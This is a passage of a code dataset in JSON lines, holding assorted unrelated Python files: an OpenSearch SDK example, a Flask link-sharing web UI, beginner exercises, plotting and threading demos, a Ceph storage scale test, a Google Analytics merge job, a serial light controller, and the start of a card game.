app_secret, base_url)\n indexSearch = Search(client)\n indexSearch.query = \"default:'opensearch'\"\n indexSearch.addIndex(index_name)\n indexSearch.addSort('updated', const.SEARCH_SORT_DESC)\n indexSearch.fetch_fields = ['id', 'title', 'updated']\n indexSearch.addAggregate('created', 'count()')\n indexSearch.addDistinct('owner_id')\n indexSearch.start = 0\n indexSearch.hits = 50\n ret = await indexSearch.call()\n client.session.close()\n print('search result: ', ret)\n\n\nasync def doc_delete():\n client = Client(app_key, app_secret, base_url)\n indexDoc = IndexDoc(client, index_name)\n ret = await indexDoc.delete(doc_id, table_name)\n client.session.close()\n print('delete doc status: ', ret['status'])\n\n\nasync def run():\n await doc_add()\n await doc_get()\n await doc_update()\n await doc_after_update_get()\n await search()\n await doc_delete()\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(run())\n","sub_path":"day2/s1/search/src/aliyun-opensearch-python-sdk-master/example/py35_asyncio.py","file_name":"py35_asyncio.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"413304229","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Blueprint, render_template, request, flash, redirect, url_for\n\nfrom waikup.lib import globals as g\nfrom waikup.models import Link, Category, Paginated\nfrom waikup.forms import NewLinkForm, ChangePasswordForm, EditLinkForm, SimpleLinkForm, flash_form_errors\n\nITEMS_PER_PAGE = 10\n\n\nwebui = Blueprint('webui', __name__)\n\n\ndef list_links(page_name, links=None):\n toggle_link_id = request.args.get('toggle')\n page_num = request.args.get('page')\n toggle_form = SimpleLinkForm()\n delete_form = SimpleLinkForm()\n if (page_num is None) or (not page_num.isdigit()):\n page_num = 1\n else:\n page_num = int(page_num)\n if toggle_form.validate_on_submit():\n result_ok = Link.toggle_archiving(toggle_link_id)\n if result_ok:\n flash(\"Toggled archiving for link %s\" % toggle_link_id, category=\"success\")\n else:\n flash(\"Link does not exist: %s\" % toggle_link_id, category=\"danger\")\n else:\n flash_form_errors(toggle_form)\n if links is None:\n links = Link.select().where(Link.archived == (page_name == 'archives')).order_by(Link.submitted.desc())\n links = Paginated(links, page_num, ITEMS_PER_PAGE, links.count())\n return render_template(\n 'links_list.html',\n page_name=page_name,\n links=links,\n toggle_form=toggle_form,\n delete_form=delete_form\n )\n\n\n@webui.route('/', methods=['GET', 'POST'])\n@g.auth.login_required\ndef index():\n return list_links('index')\n\n\n@webui.route('/archives', methods=['GET', 'POST'])\n@g.auth.login_required\ndef archives():\n return list_links('archives')\n\n\n@webui.route('/newlink', methods=['POST'])\n@g.auth.login_required\ndef new_link():\n redirect_to = request.args.get('redir', 'index')\n redirect_to = url_for('webui.'+redirect_to)\n form = NewLinkForm()\n form.set_category_choices()\n if form.validate_on_submit():\n user = g.auth.get_logged_in_user()\n category = Category.get(Category.name == form.category.data)\n link = Link.create(\n url=form.url.data,\n title=form.title.data,\n description=form.description.data,\n author=user,\n category=category\n )\n flash(\"New link added: %s\" % form.url.data)\n return redirect(redirect_to)\n for field_name, field_errors in form.errors.iteritems():\n for field_error in field_errors:\n flash(\"%s (field: %s)\" % (field_error, field_name), category='danger')\n return redirect(redirect_to)\n\n\n@webui.route('/chpasswd', methods=['POST'])\n@g.auth.login_required\ndef change_password():\n redirect_to = request.args.get('redir', 'index')\n redirect_to = url_for('webui.'+redirect_to)\n form = ChangePasswordForm()\n if form.validate_on_submit():\n user = g.auth.get_logged_in_user()\n errors = False\n if not user.check_password(form.old.data):\n flash(\"Wrong password\", category='danger')\n return redirect(redirect_to)\n user.set_password(form.new.data)\n user.save()\n flash(\"Password changed\", category='success')\n return redirect(redirect_to)\n for field_name, field_errors in form.errors.iteritems():\n for field_error in field_errors:\n flash(\"%s (field: %s)\" % (field_error, field_name), category='danger')\n return redirect(redirect_to)\n\n\n@webui.route('/delete', methods=['POST'])\n@g.auth.login_required\ndef delete_link():\n redirect_to = request.args.get('redir', 'index')\n redirect_to = url_for('webui.'+redirect_to)\n linkid = request.args.get('linkid')\n delete_form = SimpleLinkForm()\n if delete_form.validate_on_submit():\n if linkid is None:\n flash(\"No link specified\", category='danger')\n return redirect(redirect_to)\n link = Link.get(Link.id == linkid)\n if link is None:\n flash(\"Link not found: %s\" % linkid)\n return redirect(redirect_to)\n user = g.auth.get_logged_in_user()\n if (not user.admin) and (user.username != link.author.username):\n flash(\"You are not allowed to delete this link: %s\" % linkid, category='danger')\n return redirect(redirect_to)\n link.delete_instance()\n flash(\"Deleted link: %s\" % linkid, category='success')\n else:\n flash_form_errors(delete_form)\n return redirect(redirect_to)\n\n\n@webui.route('/email', methods=['GET', 'POST'])\n@g.auth.admin_required\ndef email_mgmt():\n return render_template(\n 'email_mgmt.html',\n page_name='email_mgmt'\n )\n\n\n@webui.route('/genmail')\n@g.auth.admin_required\ndef genmail():\n return render_template('emails/html.jinja2', links=Link.select().where(Link.archived == False))\n\n\n@webui.route('/token')\n@g.auth.login_required\ndef token():\n def generate_token(user):\n new_token = user.generate_token()\n flash('New token generated: %s' % new_token.token, category='success')\n\n def delete_token(user):\n if user.token.count() == 0:\n flash('No token to delete', category='danger')\n return\n user.delete_token()\n flash('Token deleted', category='success')\n\n token_actions = {\n 'generate': generate_token,\n 'delete': delete_token\n }\n redirect_to = request.args.get('redir', 'index')\n redirect_to = url_for('webui.' + redirect_to)\n action = request.args.get('action')\n if action is None:\n flash('No action specified', category='danger')\n return redirect(redirect_to)\n if action not in token_actions:\n flash('Unknown action: %s' % action, category='danger')\n return redirect(redirect_to)\n current_user = g.auth.get_logged_in_user()\n token_actions[action](current_user)\n return redirect(redirect_to)\n\n\n@webui.route('/stats')\n@g.auth.login_required\ndef stats():\n return render_template(\n 'stats.html',\n page_name=\"stats\"\n )\n\n\n@webui.route('/search', methods=['GET'])\n@g.auth.login_required\ndef search():\n redirect_page = request.args.get('page', 'index')\n page_num = request.args.get('page')\n if (page_num is None) or (not page_num.isdigit()):\n page_num = 1\n else:\n page_num = int(page_num)\n redirect_to = url_for('webui.' + redirect_page)\n # pattern = request.form.get('pattern')\n pattern = request.args.get('pattern')\n if pattern is None:\n flash(\"No pattern given\", category='danger')\n return list_links(redirect_page)\n archived = redirect_page == 'archives'\n pattern = \"%%%s%%\" % pattern\n links = Link.select().where(Link.archived == archived).where(\n (Link.title ** pattern) | (Link.description ** pattern)\n )\n links = Paginated(links, page_num, ITEMS_PER_PAGE, links.count())\n return render_template(\n 'links_list.html',\n page_name=redirect_page,\n links=links,\n toggle_form=SimpleLinkForm(),\n delete_form=SimpleLinkForm()\n )\n\n\n@webui.route('/edit_link/', methods=['GET', 'POST'])\n@g.auth.login_required\ndef edit_link(linkid):\n form = EditLinkForm()\n form.set_category_choices()\n link = Link.get(Link.id == linkid)\n redirect_page = request.args.get('redir', 'index')\n redirect_to = url_for('webui.'+redirect_page)\n if link is None:\n flash(\"Link not found: %d\" % linkid, category='danger')\n return redirect(redirect_to)\n if request.method == 'POST':\n user = g.auth.get_logged_in_user()\n if (not user.admin) and (user.username != link.author.username):\n flash(\"You are not allowed to edit this link: %d\" % link.id, category='danger')\n return redirect(redirect_to)\n if form.validate_on_submit():\n link.title = form.title.data\n link.url = form.url.data\n link.description = form.description.data\n category = Category.get(Category.name == form.category.data)\n link.category = category\n link.save()\n flash(\"Updated link: %d\" % link.id)\n else:\n flash_form_errors(form)\n return redirect(redirect_to)\n form.title.data = link.title\n form.url.data = link.url\n form.description.data = link.description\n form.category.data = link.category.name\n return render_template(\n 'edit_link_modal_content.html',\n edit_link_form=form,\n link=link,\n page_name=redirect_page\n )\n","sub_path":"waikup/views/webui.py","file_name":"webui.py","file_ext":"py","file_size_in_byte":8425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"44306930","text":"\nprint(\"DESAFIOS DE NÍVEL 1 - PHYTON 3\")\n\n\ndef divisores():\n print(\"Desafio 1: divisores de 7 que nao são por 5\")\n\n numeros_desafio = []\n for n in range(200, 3201):\n if (n%7==0) and (n%5!=0):\n numeros_desafio.append(n)\n\n print(\"RESPOSTA DESAFIO 1:\", numeros_desafio)\n\n\n\n\n\n#Desafio 2: fatore qualquer número#\nprint(\"Desafio 2: Fatoração\")\ndef fat():\n n = input(\"Digite um número:\")\n n = int(n)\n\n if ( n == 0):\n print(\"Fatoração = 0\")\n elif(n==1):\n print(\"Fatoração = 1\")\n else :\n theFactors = []\n for i in range(2,n+1):\n while n % i == 0:\n n = n/i\n print(i)\n theFactors.append(i)\n i = int(i)\n sobrou = print(\"Sobrou\", n)\n print(\"RESPOSTA DESAFIO 2:\", theFactors)\n\n\n#Desafio 3\n\ndef append_list():\n numero_digitado = int(input(\"Digite aqui um número:\"))\n\n x = []\n\n for numero_ql in range(1, numero_digitado + 1):\n x.append(numero_ql)\n y = numero_ql * numero_ql\n x.append(y)\n print(x)\n\n #Questão 4\n\n\nprint(\"Questão 4:\")\n\ndef substituicao_lista():\n j = [14, 15, 17]\n\n t = [ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n t[3:10] = []\n print(t)\n\n j = str(j)\n\n y = j.strip(\"a\")\n\n print(y)\n\ndef calculo_salario ():\n salario_hora = int(input(\"Quanto você ganha por hora?\"))\n horas_trabalhadas = int(input(\"Quantas horas trabalha no mês?\"))\n\n salario_bruto = salario_hora * horas_trabalhadas\n percent_ir = 0.11 * salario_bruto\n percent_inss = 0.08 * salario_bruto\n percent_sindicato = 0.05 * salario_bruto\n\n salario_liquido = int(salario_bruto - percent_ir - percent_inss - percent_sindicato)\n\n print(\"Seu salário descontando os impostos é de:\", salario_liquido)\n\n\n\n","sub_path":"multiplos.py","file_name":"multiplos.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"462343311","text":"# 2c\n# Jacob Soto Vilchez\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\nt=np.linspace(0,4*math.pi,100)\nf=np.sin(3*t)*np.cos(2*t)\nplt.plot(t,f,linewidth=2,color='green')\n#Grafico 2\ng=(1/2*np.cos(t))+(5/2*np.cos(5*t))\nplt.plot(t,g,linewidth=2,color='orange')\nplt.legend('fg')\nplt.grid(True)\nplt.title('Funciones trigonometricas')\nplt.xlabel('x')\nplt.ylabel('f(t),g(t)')\nplt.savefig('graf2c.png')\nplt.show()\n","sub_path":"Laboratorios JACOB/LABORATORIO 3B/2C.py","file_name":"2C.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"523882392","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n__author__ = \"Simon Liu\"\n\nimport time\nimport threading\n\n\ndef get_detail_html(url):\n print(\"get detail html started\")\n time.sleep(2)\n print(\"get detail html end\")\n\n\ndef get_detail_url(url):\n print(\"get detail url started\")\n time.sleep(4)\n print(\"get detail url end\")\n\n\nif __name__ == \"__main__\": # 函数方法 arg 为函数参数\n thread1 = threading.Thread(target=get_detail_html, args=(\"\",))\n thread2 = threading.Thread(target=get_detail_url, args=(\"\",))\n\n thread1.setDaemon(True)\n # thread2.setDaemon(True) # 将两个线程设置为守护线程,即主线程退出,这两个子线程也退出,kill\n\n start_time = time.time() # 子程开始\n thread1.start()\n thread2.start() # 当主线程退出的时候, 子线程kill掉\n\n # thread1.join()\n print (\"last time: {}\".format(time.time()-start_time)) # 输出get detail html started\n","sub_path":"JSON_RPC/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"428834179","text":"\"\"\"\nScale TC to perform PVC Scale and Respin of Ceph pods in parallel\n\"\"\"\nimport logging\nimport pytest\nimport threading\n\nfrom ocs_ci.helpers import helpers, disruption_helpers\nfrom ocs_ci.ocs import constants\nfrom ocs_ci.ocs.resources import pod\nfrom ocs_ci.utility import utils\nfrom ocs_ci.framework.testlib import scale, E2ETest, ignore_leftovers\nfrom ocs_ci.framework.pytest_customization.marks import skipif_external_mode\n\nlog = logging.getLogger(__name__)\n\n\nclass BasePvcCreateRespinCephPods(E2ETest):\n \"\"\"\n Base Class to create POD with PVC and respin ceph Pods\n \"\"\"\n\n def create_pvc_pod(self, rbd_sc_obj, cephfs_sc_obj, number_of_pvc, size):\n \"\"\"\n Function to create multiple PVC of different type and bind mount them to pods\n\n Args:\n rbd_sc_obj (obj_dict): rbd storageclass object\n cephfs_sc_obj (obj_dict): cephfs storageclass object\n number_of_pvc (int): pvc count to be created for each types\n size (str): size of each pvc to be created eg: '10Gi'\n \"\"\"\n log.info(f\"Create {number_of_pvc} pvcs and pods\")\n cephfs_pvcs = helpers.create_multiple_pvc_parallel(\n cephfs_sc_obj,\n self.namespace,\n number_of_pvc,\n size,\n access_modes=[constants.ACCESS_MODE_RWO, constants.ACCESS_MODE_RWX],\n )\n rbd_pvcs = helpers.create_multiple_pvc_parallel(\n rbd_sc_obj,\n self.namespace,\n number_of_pvc,\n size,\n access_modes=[constants.ACCESS_MODE_RWO, constants.ACCESS_MODE_RWX],\n )\n # Appending all the pvc obj to base case param for cleanup and evaluation\n self.all_pvc_obj.extend(cephfs_pvcs + rbd_pvcs)\n\n # Create pods with above pvc list\n cephfs_pods = helpers.create_pods_parallel(\n cephfs_pvcs, self.namespace, constants.CEPHFS_INTERFACE\n )\n rbd_rwo_pvc, rbd_rwx_pvc = ([] for i in range(2))\n for pvc_obj in rbd_pvcs:\n if pvc_obj is not None:\n if type(pvc_obj) is list:\n for pvc_ in pvc_obj:\n if pvc_.get_pvc_access_mode == constants.ACCESS_MODE_RWX:\n rbd_rwx_pvc.append(pvc_)\n else:\n rbd_rwo_pvc.append(pvc_)\n else:\n if pvc_obj.get_pvc_access_mode == constants.ACCESS_MODE_RWX:\n rbd_rwx_pvc.append(pvc_obj)\n else:\n rbd_rwo_pvc.append(pvc_obj)\n\n rbd_rwo_pods = helpers.create_pods_parallel(\n rbd_rwo_pvc, self.namespace, constants.CEPHBLOCKPOOL\n )\n rbd_rwx_pods = helpers.create_pods_parallel(\n rbd_rwx_pvc, self.namespace, constants.CEPHBLOCKPOOL, raw_block_pv=True\n )\n temp_pod_objs = list()\n temp_pod_objs.extend(cephfs_pods + rbd_rwo_pods)\n # Appending all the pod obj to base class param for cleanup and evaluation\n self.all_pod_obj.extend(temp_pod_objs + rbd_rwx_pods)\n\n # Start respective IO on all the created PODs\n threads = list()\n for pod_obj in temp_pod_objs:\n process = threading.Thread(\n target=pod_obj.run_io,\n args=(\n \"fs\",\n \"512M\",\n ),\n )\n process.start()\n threads.append(process)\n for pod_obj in rbd_rwx_pods:\n process = threading.Thread(\n target=pod_obj.run_io,\n args=(\n \"block\",\n \"512M\",\n ),\n )\n process.start()\n threads.append(process)\n for process in threads:\n process.join()\n\n def respin_ceph_pod(self, resource_to_delete):\n \"\"\"\n Function to respin ceph pods one by one,\n delete_resource functions checks for the deleted pod back up and running\n\n Args:\n resource_to_delete (str): Ceph resource type to be deleted.\n eg: mgr/mon/osd/mds/cephfsplugin/rbdplugin/cephfsplugin_provisioner/rbdplugin_provisioner\n \"\"\"\n disruption = disruption_helpers.Disruptions()\n disruption.set_resource(resource=resource_to_delete)\n no_of_resource = disruption.resource_count\n for i in range(0, no_of_resource):\n disruption.delete_resource(resource_id=i)\n # Validate storage pods are running\n assert pod.wait_for_storage_pods(), \"ODF Pods are not in good shape\"\n # Validate cluster health ok and all pods are running\n assert utils.ceph_health_check(\n delay=180\n ), \"Ceph health in bad state after node reboots\"\n\n def cleanup(self):\n \"\"\"\n Function to cleanup the SC, PVC and POD objects parallel.\n \"\"\"\n helpers.delete_objs_parallel(pod.get_all_pods(namespace=self.namespace))\n helpers.delete_objs_parallel(self.all_pvc_obj)\n self.rbd_sc_obj.delete()\n self.cephfs_sc_obj.delete()\n\n\n@scale\n@ignore_leftovers\n@skipif_external_mode\n@pytest.mark.parametrize(\n argnames=\"resource_to_delete\",\n argvalues=[\n pytest.param(\n *[\"mgr\"],\n marks=[\n pytest.mark.polarion_id(\"OCS-766\"),\n pytest.mark.skip(reason=\"Skipped due to bz 2130867\"),\n ],\n ),\n pytest.param(*[\"mon\"], marks=[pytest.mark.polarion_id(\"OCS-764\")]),\n pytest.param(*[\"osd\"], marks=[pytest.mark.polarion_id(\"OCS-765\")]),\n pytest.param(*[\"mds\"], marks=[pytest.mark.polarion_id(\"OCS-613\")]),\n pytest.param(\n *[\"cephfsplugin_provisioner\"], marks=[pytest.mark.polarion_id(\"OCS-2641\")]\n ),\n pytest.param(\n *[\"rbdplugin_provisioner\"], marks=[pytest.mark.polarion_id(\"OCS-2639\")]\n ),\n pytest.param(*[\"rbdplugin\"], marks=[pytest.mark.polarion_id(\"OCS-2643\")]),\n pytest.param(*[\"cephfsplugin\"], marks=[pytest.mark.polarion_id(\"OCS-2642\")]),\n ],\n)\nclass TestPVSTOcsCreatePVCsAndRespinCephPods(BasePvcCreateRespinCephPods):\n \"\"\"\n Class for PV scale Create Cluster with 1000 PVC, then Respin ceph pods parallel\n \"\"\"\n\n @pytest.fixture()\n def setup_fixture(self, request):\n def finalizer():\n self.cleanup()\n\n request.addfinalizer(finalizer)\n\n @pytest.fixture()\n def namespace(self, project_factory):\n \"\"\"\n Create a project for the test\n \"\"\"\n proj_obj = project_factory()\n self.namespace = proj_obj.namespace\n\n @pytest.fixture()\n def storageclass(self, storageclass_factory):\n \"\"\"\n Create Storage class for rbd and cephfs\n \"\"\"\n self.rbd_sc_obj = storageclass_factory(interface=constants.CEPHBLOCKPOOL)\n self.cephfs_sc_obj = storageclass_factory(interface=constants.CEPHFILESYSTEM)\n\n def test_pv_scale_out_create_pvcs_and_respin_ceph_pods(\n self,\n namespace,\n storageclass,\n setup_fixture,\n resource_to_delete,\n ):\n pvc_count_each_itr = 10\n scale_pod_count = 120\n size = \"10Gi\"\n self.all_pvc_obj, self.all_pod_obj = ([] for i in range(2))\n\n # First Iteration call to create PVC and POD\n self.create_pvc_pod(\n self.rbd_sc_obj, self.cephfs_sc_obj, pvc_count_each_itr, size\n )\n # Re-spin the ceph pods one by one in parallel with PVC and POD creation\n while True:\n if scale_pod_count <= len(self.all_pod_obj):\n log.info(f\"Create {scale_pod_count} pvc and pods\")\n break\n else:\n thread1 = threading.Thread(\n target=self.respin_ceph_pod, args=(resource_to_delete,)\n )\n thread2 = threading.Thread(\n target=self.create_pvc_pod,\n args=(\n self.rbd_sc_obj,\n self.cephfs_sc_obj,\n pvc_count_each_itr,\n size,\n ),\n )\n thread1.start()\n thread2.start()\n thread1.join()\n thread2.join()\n\n assert utils.ceph_health_check(\n delay=180\n ), \"Ceph health in bad state after pod respins\"\n","sub_path":"tests/e2e/scale/test_pv_scale_and_respin_ceph_pods.py","file_name":"test_pv_scale_and_respin_ceph_pods.py","file_ext":"py","file_size_in_byte":8392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"452607030","text":"import click\nimport sqlite3\nimport pandas as pd\nimport conf\nfrom libs.utils import divide_list\nfrom flask.cli import with_appcontext\nimport os\nfrom google.cloud import storage\n\n\ndef get_table_data_as_dataframe(date, table_category_name):\n db_name = conf.SQLITE_DATABASE_NAME\n conn = sqlite3.connect(db_name)\n table_name = conf.TABLE_PREFIX + date.replace(\"-\", \"\") + \"_\" + table_category_name\n try:\n # rdbのデータをpandasのDataFrame型で読み込む\n df = pd.read_sql(\"select * from \" + table_name, conn)\n except:\n df = get_empty_dataframe()\n return df\n\n\ndef get_empty_dataframe():\n pk_keys = [k.get(\"name\").replace(\"ga:\", \"\") for k in conf.PK_DIMENSIONS]\n df = pd.DataFrame(columns=pk_keys)\n return df\n\n\n@click.command('merge_data_to_gcs', help=\"Merge database data and upload Google Cloud Storage\")\n@click.argument('date')\n@click.argument('bucket_name')\n@click.argument('file_dir_name')\n@with_appcontext\ndef merge_data_to_gcs(date, bucket_name, file_dir_name):\n print(\"Merge data start [date]\", date.replace(\"-\", \"\"))\n\n df = get_empty_dataframe()\n for k, v in conf.DIMENSIONS_METRICS_COMBINATIONS.items():\n dimensions = v.get(\"dimensions\")\n divide_num = (len(dimensions) // (8 - len(conf.PK_DIMENSIONS))) + 1\n sublist = divide_list(dimensions, divide_num)\n for i, elem in enumerate(sublist):\n df = pd.merge(df, get_table_data_as_dataframe(date, k + \"_\" + str(i + 1)), how='outer')\n\n for k, v in conf.MERGE_DATA_FRAME_APPLY_SETTINGS.items():\n try:\n df[v.get(\"key_after_convert\")] = df[k].apply(v.get(\"apply_func\"))\n except KeyError as e:\n if v.get(\"raise_error\"):\n raise e\n\n temp_file_name = 'temp.json'\n df.to_json(temp_file_name,\n orient=\"records\",\n lines=True)\n file_name = conf.CSV_PREFIX + date.replace(\"-\", \"\") + \".json\"\n client = storage.Client()\n bucket = client.get_bucket(bucket_name)\n blob = bucket.blob(file_dir_name + file_name)\n blob.upload_from_filename(filename=temp_file_name)\n if os.path.exists(temp_file_name): os.remove(temp_file_name)\n","sub_path":"jobs/merge_data_to_gcs.py","file_name":"merge_data_to_gcs.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"350419667","text":"from time import sleep\nimport serial\nimport json\n\nclass LightController:\n def __init__(self):\n self.lightmap = dict()\n self.stripmap = dict()\n self.commandmap = dict()\n\n # Reads local files for serial command mapping\n self._getLightMap()\n self._getStripMap()\n self._getCommandMap()\n\n # Load saved light states\n self._getState()\n self.loadFromState()\n\n self.ser = serial.Serial()\n self.ser.baudrate = 9600\n self.ser.port = '/dev/ttyACM0'\n try:\n self.ser.open()\n except:\n print('Failed to open serial port')\n\n\n def fadeStrip(self,strip):\n for i in range (256):\n hexString = \"\"\n hexString += self.commandmap['color']\n hexString += self.lightmap[strip]\n\n levelCommand = bytearray.fromhex(hexString)\n level = i.to_bytes(1, byteorder='big')\n\n levelCommand.join(level)\n levelCommand.join(level)\n levelCommand.join(level)\n self.ser.write(levelCommand)\n sleep(.05)\n\n\n def setLightState(self, light, state):\n # Update the state\n if light in self.lightmap:\n if state:\n self.state['lights'][light] = 1\n else:\n self.state['lights'][light] = 0\n self._saveState()\n\n # Build serial command from arguments\n hexString = \"\"\n if(state):\n hexString += self.commandmap['on']\n else:\n hexString += self.commandmap['off']\n hexString += self.lightmap[light]\n\n # Cast hex to bytes and send command\n command = bytearray.fromhex(hexString)\n print(\"Writing \" + str(state) + \" to \" + str(light))\n try:\n self.ser.write(command)\n except:\n print('Write failed. Serial port isn\\'t open')\n\n\n def setStripColor(self, strip, color):\n # Update the state\n if(strip in self.lightmap):\n self.state['strips'][strip] = color\n self._saveState()\n\n # Build serial command from arguments\n hexString = \"\"\n hexString += self.commandmap['color']\n hexString += self.stripmap[strip]\n hexString += color.strip('# \\t\\n')\n\n # Cast hex to bytes and send command\n command = bytearray.fromhex(hexString)\n print(\"Writing \" + str(color) + \" to \" + str(strip))\n try:\n self.ser.write(command)\n except:\n print('Write failed. Serial port isn\\'t open')\n\n\n def loadFromState(self):\n # Load strip colors\n for strip, color in self.state['strips'].items():\n self.setStripColor(strip,color)\n\n # Load light states\n for light, state in self.state['lights'].items():\n self.setLightState(light,state)\n\n # Returns the dict of the current light states\n def getState(self):\n return self.state\n\n def _getStripMap(self):\n f = open('stripmap.txt','r')\n for line in f:\n name, number = line.strip().split(':')\n self.stripmap[name] = number\n\n def _getLightMap(self):\n f = open('lightmap.txt', 'r')\n for line in f:\n name, number = line.strip().split(':')\n self.lightmap[name] = number\n\n print(self.lightmap)\n\n\n def _getCommandMap(self):\n f = open('commandMapping.txt', 'r')\n for line in f:\n command, number = line.strip().split(':')\n self.commandmap[command] = number\n\n def _saveState(self):\n try:\n f = open('state.json','w')\n json.dump(self.state, f, sort_keys=True, indent=4)\n except:\n print('Error writing state')\n\n def _getState(self):\n # Load state saved light state\n self.state = dict()\n self.state['lights'] = dict()\n self.state['strips'] = dict()\n try:\n fp = open('state.json', 'r')\n self.state = json.load(fp)\n except:\n print('State file not found, loading defaults')\n try:\n fp = open('default.json', 'r')\n self.state = json.load(fp)\n except:\n print('Default state not found, arduino defaults will be loaded')\n","sub_path":"lightController.py","file_name":"lightController.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"52695754","text":"vector = ((0, 1), (0, -1), (1, 0), (-1, 0))\n\n\ndef dfs(y, x, num, depth):\n if depth == 7:\n numbers.add(num)\n return\n\n for v in vector:\n ty, tx = y + v[0], x + v[1]\n if 0 <= ty < 4 and 0 <= tx < 4:\n dfs(ty, tx, num + grid[ty][tx], depth + 1)\n\n\ndef solve():\n for pos in range(0, 16):\n y, x = (pos // 4, pos % 4)\n dfs(y, x, \"\", 0)\n return len(numbers)\n\n\nfor testNo in range(1, int(input()) + 1):\n grid = []\n numbers = set()\n\n for _ in range(4):\n grid.append(input().split())\n print(f'#{testNo} {solve()}')\n","sub_path":"풀이/swea/recommends/2819_o.py","file_name":"2819_o.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"203967571","text":"# encoding:utf-8\n# @Time : 2019/3/19 17:37\n# @Author : Jerry Chou\n# @File : main_v10.0.py\n# @Function : 1.法力水晶从1开始每轮+1直到10\n# 2.每轮敌我双方交替出牌,出的卡牌水晶总数不能超过本轮水晶数\n# 3.上场的卡牌随机攻击对方场上卡牌,如果对方场上没有卡牌,则攻击对方英雄\n# 4.一方英雄死亡,游戏结束\n# 5.增加疲劳机制:抽完卡牌,每个回合扣血,扣血量每个回合+1\n# 6.如果敌方场上卡牌>1,手动选择攻击的卡牌\n# 7.我方回合选择上场的卡牌\n# 8.增加战士英雄技能,先选择卡牌是否上场,后选择是否使用英雄技能\n# 9.敌方有卡牌在场时,我方卡牌先选择是否攻击敌方英雄,如果不攻击敌方英雄则选择攻击敌方在场卡牌(>1)\n# 使用英雄技能和卡牌上场由用户选择,每个回合只能用一次英雄技能\n# 优化循环判断层次比较多的代码\n\nfrom generate_cards import generate_cards\nfrom fight import *\nfrom random import randint\n\nCARD_NUM = 10\nINIT_HAND_COUNT = 3\nHERO_HEALTH = 30\n\n\nclass Hero:\n def __init__(self, hero_class, hero_name):\n self.health = 30\n self.hero_class = hero_class\n self.hero_name = hero_name\n self.use_power = False\n\n def health_change(self, change):\n self.health += change\n\n\nclass world:\n def __init__(self):\n self.mana = 1\n self.myworldcards = []\n self.enemyworldcards = []\n # self.myherohealth = HERO_HEALTH\n self.myhero = Hero('warrior', '加尔鲁什·地狱咆哮')\n # self.enemyherohealth = HERO_HEALTH\n self.enemyhero = Hero('warrior', '加尔鲁什·地狱咆哮')\n self.init_hand_count = INIT_HAND_COUNT\n print(\"**************我的卡牌**************\")\n self.mycards = generate_cards(CARD_NUM)\n self.show_cards(self.mycards)\n self.myhandcards = self.mycards[:INIT_HAND_COUNT]\n print(\"**************敌方卡牌**************\")\n self.enemycards = generate_cards(CARD_NUM)\n self.show_cards(self.enemycards)\n self.enemyhandcards = self.enemycards[:INIT_HAND_COUNT]\n self.round = 1\n self.myturn = True\n self.tired = 0\n\n def use_power(self, hero):\n if hero.hero_class == 'warrior':\n hero.health += 2\n\n def turn_round(self):\n\n self.myhero.use_power = False\n\n self.show_world()\n self.draw_card()\n\n if self.hero_death(self.myhero.health):\n print(\"~~~~~~~~~~~游戏结束,你输了游戏:我方英雄疲劳死!!!~~~~~~~~~~~~~\")\n else:\n self.use_mana_action(self.mana)\n self.show_world_cards(False)\n self.myworldcards, self.enemyworldcards, self.enemyhero = self.battle(self.myworldcards,\n self.enemyworldcards, self.enemyhero)\n\n if self.hero_death(self.enemyhero.health):\n print(\"~~~~~~~~~~~~游戏结束,恭喜你获得胜利:敌方英雄被我方卡牌打死!!!~~~~~~~~~~~~\")\n else:\n self.myturn = False\n\n self.draw_card()\n\n if self.hero_death(self.enemyhero.health):\n print(\"~~~~~~~~~~~游戏结束,恭喜你获得胜利:敌方英雄疲劳死!!!~~~~~~~~~~~~~\")\n else:\n\n self.use_mana_action(self.mana)\n self.show_world_cards(False)\n self.enemyworldcards, self.myworldcards, self.myhero = self.battle(self.enemyworldcards,\n self.myworldcards, self.myhero)\n\n if self.hero_death(self.myhero.health):\n print(\"~~~~~~~~~~~游戏结束,你输了游戏:我方英雄被敌方卡牌打死!!!~~~~~~~~~~~~~\")\n else:\n self.round += 1\n\n # 水晶达到10后不再增加\n if self.mana < 10:\n self.mana += 1\n\n self.init_hand_count += 1\n\n self.myturn = True\n\n self.turn_round()\n\n def draw_card(self):\n '''\n 有牌抽牌,无牌加疲劳值\n :return: \n '''\n if self.init_hand_count < CARD_NUM:\n self.myhandcards.append(self.mycards[self.init_hand_count])\n self.enemyhandcards.append(self.enemycards[self.init_hand_count])\n else:\n self.tired += 1\n print(\"oooooooooooooooooooooooooo本回合疲劳值为:%s\" % self.tired)\n if self.myturn:\n self.myhero.health_change(-self.tired)\n else:\n self.enemyhero.health_change(-self.tired)\n\n def show_world(self):\n print(\"++++++++++++++++++当前回合:%s,当前水晶:%s\" % (self.round, self.mana))\n\n def show_world_cards(self, order):\n '''\n 显示场上卡牌\n :return: \n '''\n if self.myturn:\n if order:\n print(\"$$$$敌方场上卡牌$$$$$$$$$$$$$\")\n for i in range(len(self.enemyworldcards)):\n print(\"{0}-{1}({2}-{3})\".format(i + 1, self.enemyworldcards[i].name, self.enemyworldcards[i].damage,\n 